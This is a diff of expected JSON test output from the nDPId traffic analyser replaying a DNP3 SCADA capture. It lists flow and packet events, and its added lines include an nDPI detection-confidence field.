+00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097501938503,"flow_last_seen":1097501938504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097501938504,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097502623045,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1097502623045,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="}
-00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097502623045,"flow_last_seen":1097502623047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097502623047,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
-00635{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097502623045,"flow_last_seen":1097502648678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1097504102255,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097502623045,"flow_last_seen":1097502623047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097502623047,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00661{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097502623045,"flow_last_seen":1097502648678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1097504102255,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097504102255,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1097504102255,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="}
 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="}
-00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097504102255,"flow_last_seen":1097504102257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097504102257,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097504102255,"flow_last_seen":1097504102257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097504102257,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097505644006,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1097505644006,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="}
-00639{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097505644006,"flow_last_seen":1097505719035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097505644006,"flow_last_seen":1097505719035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097507785883,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1097507785883,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097507785883,"flow_last_seen":1097507785885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097507785885,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
-00642{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":427,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1097507834960,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
-00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
-00642{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097507785883,"flow_last_seen":1097507785885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097507785885,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":427,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1097507834960,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097501938503,"flow_last_seen":1097502062040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":1097505644006,"flow_last_seen":1097506028601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097510947092,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1097510947092,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1097510947092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097510947092,"pkt":"AAKzznBRAFAEk3BnCABFAAAwBZtAAIAG4SIKAAAICgAAAwSHTiCYpsdTAAAAAHAC\/\/+8cwAAAgQFtAEBBAI="}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097510947092,"flow_last_seen":1097510947094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097510947094,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
-00641{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097510947092,"flow_last_seen":1097510947094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097510947094,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1159,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":138,"flow_first_seen":1097504102255,"flow_last_seen":1097504224083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":3417,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
+00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":472,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":93,"flow_first_seen":1097507785883,"flow_last_seen":1097507856257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":1419,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1097512255234,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
